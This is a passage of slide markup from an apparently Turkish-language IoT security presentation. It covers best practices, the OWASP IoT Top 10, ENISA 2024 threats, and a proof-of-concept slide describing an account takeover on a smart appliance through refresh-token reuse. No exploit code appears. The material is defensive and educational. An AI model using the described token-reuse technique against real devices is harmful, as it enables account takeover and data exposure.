                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅ 6. Güvenlik Önlemleri ve En İyi Pratikler</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Token bazlı erişim + Expire mekanizmaları (JWT → kısa ömürlü)</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TLS 1.2+ kullanımı, Mutual Auth (mTLS)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Firmware signing &amp; encryption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OTA güncellemelerinde kimlik doğrulama</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Mobil uygulamada root detection, obfuscation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API rate limiting &amp; anomaly detection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Logging + SIEM entegrasyonu</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p25"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451500" y="305150"/>
            <a:ext cx="7292400" cy="1587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 sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🚀 8. Gelecek Trendleri</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IoT için Zero Trust yaklaşımları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AI destekli anomaly detection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Edge Computing &amp; güvenlik karmaşıklığı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OTA over blockchain?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IoT cihazlar için SBOM zorunluluğu (NTIA/NIST çalışmaları)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p26"/>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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="767550"/>
            <a:ext cx="67677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t>OWASP IoT Top 10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ENISA IoT Threat Landscape</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>NIST SP 800-213 (IoT Security Baselines)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="416150"/>
            <a:ext cx="3828600" cy="2269200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="127000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP IoT Top 10 - 2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is now available.</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I1 Weak Guessable, or Hardcoded Passwords</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I2 Insecure Network Services</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I3 Insecure Ecosystem Interfaces</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I4 Lack of Secure Update Mechanism</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I5 Use of Insecure or Outdated Components</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I6 Insufficient Privacy Protection</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I7 Insecure Data Transfer and Storage</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I8 Lack of Device Management</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I9 Insecure Default Settings</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I10 Lack of Physical Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p27"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271150" y="179775"/>
            <a:ext cx="8672400" cy="497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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🛡 ENISA Threat Landscape 2024</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔥 En Kritik Tehditler</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Ransomware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Çoklu şantaj teknikleriyle veri ve hizmet gaspı.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Malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Gizli işlemlerle sistemlerin gizliliğini, bütünlüğünü ve erişilebilirliğini tehdit eden zararlı yazılımlar.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Social Engineering:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Phishing, smishing*, baiting* gibi insan hatasını sömüren aldatma taktikleri.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SMS yoluyla yapılan kimlik avı saldırısıdır; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>baiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ise kullanıcıyı cazip bir yemle kandırarak zararlı yazılım indirmesini veya bilgi vermesini sağlamaya yönelik sosyal mühendislik saldırısıdır.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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Veri </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tehditleri</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</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i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Breach:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kasıtlı saldırılarla veri sızdırma.</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i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Leak:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Yanlış yapılandırma/hata kaynaklı istemsiz veri açığı.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Hizmet Reddi (DDoS):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Servis veya altyapı kaynaklarını tüketerek erişim engelleme.</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Bilgi Manipülasyonu (FIMI):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Değer ve süreçleri saptıran, devlet destekli veya bağımsız dezenformasyon faaliyetleri.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📈 Öne Çıkan Trendler</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Ransomware &amp; DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> saldırıları hâlâ en yaygın tehditler arasında.</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LOTS (Living Off Trusted Sites):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> C2 iletişimlerini meşru servislerle gizleme (Slack, Telegram).</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LOTL (Living Off The Land):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Sistem araçlarını kullanarak iz bırakmayan saldırı teknikleri.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Jeopolitik Faktörler:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Devlet destekli tehdit aktörleri ve siber casusluk artışı.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔗 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kaynak: ENISA Threat Landscape 2024 (Haziran 2023 – Temmuz 2024 dönemi)</a:t>
            </a:r>
            <a:br>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📎 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>enisa.europa.eu/publications/enisa-threat-landscape</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p28"/>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PoC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145150" y="3128675"/>
            <a:ext cx="6501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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3584500" y="2704700"/>
            <a:ext cx="30000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rgbClr val="1F1F1F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JWT Token Reuse</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="1F1F1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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576300" y="2118600"/>
            <a:ext cx="8520600" cy="7926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0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔍 Vulnerability Summary</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type: Account Takeover (ATO)</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CWE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CWE-287</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Improper Authentication</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**Estimated CVSS from HIGH to CRITICAL</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Test Date: 2025-05-10</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Environment: iOS Device + Burp Suite</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Target Device: IoT Smart Appliance (e.g., Washer)</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Network Context: Internal Wi-Fi, Proxy Server</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Google Shape;215;p30" title="IoT workflow.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575200" y="451076"/>
            <a:ext cx="5469650" cy="1711925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1032125" y="4151100"/>
            <a:ext cx="7909800" cy="1059600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The same refresh token was reused 100 times in one hour, each time successfully returning new credentials and exposing sensitive data.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;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p31" title="ChatGPT Image May 28, 2025 at 11_19_30 PM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154650" y="192250"/>
            <a:ext cx="4758999" cy="4758999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
